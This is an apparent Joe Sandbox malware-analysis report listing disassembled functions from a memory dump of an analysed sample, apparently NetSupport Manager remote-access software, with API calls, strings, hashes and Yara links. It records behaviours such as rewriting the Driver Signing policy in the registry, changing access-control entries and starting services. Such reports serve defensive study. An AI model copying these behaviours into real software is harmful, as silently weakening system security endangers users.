                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr_wcsncpy$__wcsicoll_memsetwsprintf
                                                                                                                        • String ID: Client$[%s]%c
                                                                                                                        • API String ID: 993887429-4156239840
                                                                                                                        • Opcode ID: 712fcee0d1e86a61d43fca14cff3ab3e3580bfcad69f5edc6209e24dd2b07b86
                                                                                                                        • Instruction ID: e6b0e9f772c869a766ced940bd65edf2f7d2be9b78ca2eb2fea725b7e912b496
                                                                                                                        • Opcode Fuzzy Hash: 712fcee0d1e86a61d43fca14cff3ab3e3580bfcad69f5edc6209e24dd2b07b86
                                                                                                                        • Instruction Fuzzy Hash: E441E675A003059ACB24EF65CC56BE773B9EF58300F0445A4FD1ADB295FBB0AA80C790
                                                                                                                        Function 00AE8020 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 122registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AE805D
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?), ref: 00AE80E5
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00AE8154
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00AE8168
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00AE8196
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 00AE819D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$CriticalEnumSection$DeleteEnterInfoLeaveQuery
                                                                                                                        • String ID: ..\CTL32\Config.cpp$err == 0$maxname < _tsizeof (keybuf)
                                                                                                                        • API String ID: 3037067311-2757561423
                                                                                                                        • Opcode ID: e2deb063aefd7a667fc8c89b444b6ebb60203eb65f1e94957b3c64ad79a23634
                                                                                                                        • Instruction ID: b6f13ab86bc3d52c3e6326766fa9b822aef764cfaaea3cc335fecb7a09297558
                                                                                                                        • Opcode Fuzzy Hash: e2deb063aefd7a667fc8c89b444b6ebb60203eb65f1e94957b3c64ad79a23634
                                                                                                                        • Instruction Fuzzy Hash: D0418471A80219AFDB14DF54CC85FE5B7B8FB54B00F004299F609A72D0DBB46945CFA1
                                                                                                                        Function 00B1C420 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __fassign_wcstok$__getptd__wcsicoll_wcsncpywcstoxl
                                                                                                                        • String ID: /-:
                                                                                                                        • API String ID: 3794802509-347849708
                                                                                                                        • Opcode ID: 4b9c2c5d10dcf98cc35021ad1d8a8e0ed416468c2ee8cc0f0c75b3c157fc593a
                                                                                                                        • Instruction ID: b6aaea394d9183a4ecc8102cef0af65b8dfce8a4fd553c76aad65c2043a21c44
                                                                                                                        • Opcode Fuzzy Hash: 4b9c2c5d10dcf98cc35021ad1d8a8e0ed416468c2ee8cc0f0c75b3c157fc593a
                                                                                                                        • Instruction Fuzzy Hash: D7319971E8430477D710EBA88C42FBE77E8AF55740F6045E8FD09AB381E9B1994186A1
                                                                                                                        Function 00B0E560 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104registrysleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?,00000000,?,00000000,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E583
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E5B1
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,00B0E88D,00000004,?,Policy,00000000,?,?,?), ref: 00B0E5DF
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E607
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E638
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,00B0E88D,00000000), ref: 00B0E66C
                                                                                                                        • Sleep.KERNEL32(000003E8,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E693
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$OpenQuery$Sleep
                                                                                                                        • String ID: Policy$Software\Microsoft\Driver Signing
                                                                                                                        • API String ID: 3131223082-3913124361
                                                                                                                        • Opcode ID: 7567238cb3608cf1e48210bd1575359b97bfd0181d188a202f166d59bfa13277
                                                                                                                        • Instruction ID: b743bb21946af206ba763165ac35312244900ffb8809a7027e77e921bb78367c
                                                                                                                        • Opcode Fuzzy Hash: 7567238cb3608cf1e48210bd1575359b97bfd0181d188a202f166d59bfa13277
                                                                                                                        • Instruction Fuzzy Hash: AC3181B1B40304AFDB208B60DC85FE6B7ECFB28705F104899F656A71D0EAB4A940CB61
                                                                                                                        Function 00B32347 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91memorylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B32369
                                                                                                                        • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 00B32393
                                                                                                                        • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 00B323B8
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 00B323C2
                                                                                                                        • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 00B323E1
                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000001), ref: 00B32435
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 00B32442
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B32449
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap$AccessAddressAuditErrorLastLocalProcProcess
                                                                                                                        • String ID: SetNamedSecurityInfoW
                                                                                                                        • API String ID: 4281476915-3189892758
                                                                                                                        • Opcode ID: 51468b4ce7ffea839bac6dad646cdcc7c41f6e3300fd90518b617df0e4561da0
                                                                                                                        • Instruction ID: 8c2c95b056fd966b8bae64247058d059318809ffe7b846ca8f2df58162522207
                                                                                                                        • Opcode Fuzzy Hash: 51468b4ce7ffea839bac6dad646cdcc7c41f6e3300fd90518b617df0e4561da0
                                                                                                                        • Instruction Fuzzy Hash: 7C3142B1A00219AFDB24CF54DC89FEAB7FCEB54700F108194FA49A7290DBB49D518FA0
                                                                                                                        Function 00B1C8F0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78librarytimeloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • LoadLibraryW.KERNEL32(secur32.dll,5E06C67B), ref: 00B1C931
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserNameExW), ref: 00B1C949
                                                                                                                        • timeGetTime.WINMM ref: 00B1C95C
                                                                                                                        • timeGetTime.WINMM(?,?), ref: 00B1C973
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00B1C979
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1C99B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_wcsncpy
                                                                                                                        • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExW$secur32.dll
                                                                                                                        • API String ID: 1609405253-3336919047
                                                                                                                        • Opcode ID: ff9d214c75a3e3299eaf07585a0b6318ec7b0e18d433b12b37e28f7c93397070
                                                                                                                        • Instruction ID: 82adafb9f7d6003f5c9c2e2cc6cb3cf714ae6ee6dd20225cec9198db6111fc91
                                                                                                                        • Opcode Fuzzy Hash: ff9d214c75a3e3299eaf07585a0b6318ec7b0e18d433b12b37e28f7c93397070
                                                                                                                        • Instruction Fuzzy Hash: 03216D71940216ABCB109FA8DD49BABBBF8EB48754F044565FC09E7390EBB49900CBE5
                                                                                                                        Function 00B2EA04 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • PostMessageW.USER32(?,000003E1,?,00000000), ref: 00B2EDE1
                                                                                                                        • DestroyWindow.USER32(?), ref: 00B2EDEE
                                                                                                                        • _fputs.LIBCMT ref: 00B2EE3D
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00B2EE58
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$DestroyLocalMessagePostSleepTimeWindow_fputs_mallocwvsprintf
                                                                                                                        • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        • API String ID: 3284952262-2848714714
                                                                                                                        • Opcode ID: 4ad7accf75341fc82507eb9d7051e949cc5ff37f1088dba5363ab094d2ae9b95
                                                                                                                        • Instruction ID: ea7ad823913e19d48cc9f511da6595c4ff0f5d70d5a5e85bc14b75b0048da4bd
                                                                                                                        • Opcode Fuzzy Hash: 4ad7accf75341fc82507eb9d7051e949cc5ff37f1088dba5363ab094d2ae9b95
                                                                                                                        • Instruction Fuzzy Hash: 06112C75E412259BCB207B64BC83E6E33E4EB00301F4444F5F40E57292EEB59940C7A2
                                                                                                                        Function 00AFB030 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 00AFB04E
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFB05A
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB066
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00AFB087
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00AFB0AC
                                                                                                                        Strings
                                                                                                                        • OpenService failed! Error = %d , xrefs: 00AFB061
                                                                                                                        • ControlService failed! Error = %d , xrefs: 00AFB09C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseControlErrorHandleLastOpen_wprintf
                                                                                                                        • String ID: ControlService failed! Error = %d $OpenService failed! Error = %d
                                                                                                                        • API String ID: 941417173-3859893282
                                                                                                                        • Opcode ID: ed17bff6e3c6dc2f0c3855ab58ab0dc6790762a1b18f30b34e5a256b1c049b6d
                                                                                                                        • Instruction ID: 7cf52d528c40e66ffe9287659fcaeddecfcaa4fadad7695c78472728f65238d7
                                                                                                                        • Opcode Fuzzy Hash: ed17bff6e3c6dc2f0c3855ab58ab0dc6790762a1b18f30b34e5a256b1c049b6d
                                                                                                                        • Instruction Fuzzy Hash: AF014435A51118AF8F10AFA4AC4ADFF77ACDB09311B104195FE0997391DFB5590486A2
                                                                                                                        Function 00AFAFB0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 44serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 00AFAFC1
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFAFCD
                                                                                                                        • _wprintf.LIBCMT ref: 00AFAFD9
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00AFAFEB
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFAFF5
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB008
                                                                                                                        Strings
                                                                                                                        • OpenService failed! Error = %d, xrefs: 00AFAFD4
                                                                                                                        • StartService failure! Error = %d, xrefs: 00AFB003
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastService_wprintf$OpenStart
                                                                                                                        • String ID: OpenService failed! Error = %d$StartService failure! Error = %d
                                                                                                                        • API String ID: 1397020348-2721445038
                                                                                                                        • Opcode ID: ad36e9696fb07c8640645c699d4453a9b7fbb95a105b0016e31fb36cd6ef473d
                                                                                                                        • Instruction ID: 20babfe91e9a8ba6fa90cb88b83008242ed77935e64bbb639bfe0f7746194769
                                                                                                                        • Opcode Fuzzy Hash: ad36e9696fb07c8640645c699d4453a9b7fbb95a105b0016e31fb36cd6ef473d
                                                                                                                        • Instruction Fuzzy Hash: 49F062722502287BDE202BA8BC09EEA77AC9B04762F104051FF1CC6291DB76990056B5
                                                                                                                        Function 00B08A59 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$FreeUnlock$DeleteObject$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 938152311-0
                                                                                                                        • Opcode ID: e042bd4d8cf315b803c2db19fd79c69f3f6e462186cab00a19473f3d46102967
                                                                                                                        • Instruction ID: 8469d18a4df8717318b61ee5dbdb160f4e1759d50da178409379b7ad3f7d0fd4
                                                                                                                        • Opcode Fuzzy Hash: e042bd4d8cf315b803c2db19fd79c69f3f6e462186cab00a19473f3d46102967
                                                                                                                        • Instruction Fuzzy Hash: 29416FB1D04298ABCF21DFA4C8909EEBFB5FF59314F1941C9E88467252CB75AE41CB60
                                                                                                                        Function 00B2C390 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 469COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • _memset.LIBCMT ref: 00B2C60A
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B2C7C9
                                                                                                                          • Part of subcall function 00B0D730: GetVersion.KERNEL32 ref: 00B0D78A
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                          • Part of subcall function 00B21CE0: _free.LIBCMT ref: 00B21D23
                                                                                                                          • Part of subcall function 00B21CE0: _free.LIBCMT ref: 00B21D29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _freewsprintfwvsprintf$LoadLocalStringTimeVersion__wcsicoll_malloc_memset
                                                                                                                        • String ID: ACM$CIC$EVAL$MungeSerFile(%d)$PENDING REGISTRATION$munge nsm.lic, cks=%x, expiry=%d/%d/%d, start=%d/%d/%d
                                                                                                                        • API String ID: 1348281864-2017245053
                                                                                                                        • Opcode ID: 64b6039f7232042356eb5519b8e3a2e83cff382f64a7bc51368c34cdc1417940
                                                                                                                        • Instruction ID: 71c42e743ad0cf527bd6ff6a6d1d7ba09363adabd5b3eff50b701cb6e8d8ce5d
                                                                                                                        • Opcode Fuzzy Hash: 64b6039f7232042356eb5519b8e3a2e83cff382f64a7bc51368c34cdc1417940
                                                                                                                        • Instruction Fuzzy Hash: 4F02C7769102299EDB20EB64ED017FE77F4EF59700F0445EAE80D972A1FB705A84CB91
                                                                                                                        Function 00B263C0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 222COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B26429
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B00E40: _malloc.LIBCMT ref: 00B00E5C
                                                                                                                          • Part of subcall function 00B044E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,5E06C67B,00000000,00000000), ref: 00B0452B
                                                                                                                        • _malloc.LIBCMT ref: 00B26594
                                                                                                                        • _free.LIBCMT ref: 00B26693
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc$EnumOpen_freewsprintf
                                                                                                                        • String ID: %s\%s$IsA()$Restore Reg, %s=%d$Restore Reg, %s=%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 3923150065-744369672
                                                                                                                        • Opcode ID: d0fa266031a23504ab90cd895fc30427ed300f0c15bd0da8bfabd4ef03ab1ab1
                                                                                                                        • Instruction ID: 9023fa3d6b1c7c405aea596a2a7e5b01340ef18561d9683f9baa655b5e213811
                                                                                                                        • Opcode Fuzzy Hash: d0fa266031a23504ab90cd895fc30427ed300f0c15bd0da8bfabd4ef03ab1ab1
                                                                                                                        • Instruction Fuzzy Hash: 8D817C729006289BCB24DB54DD51BEBB7F8EF99715F0041D9E91AA3281EB706F84CF90
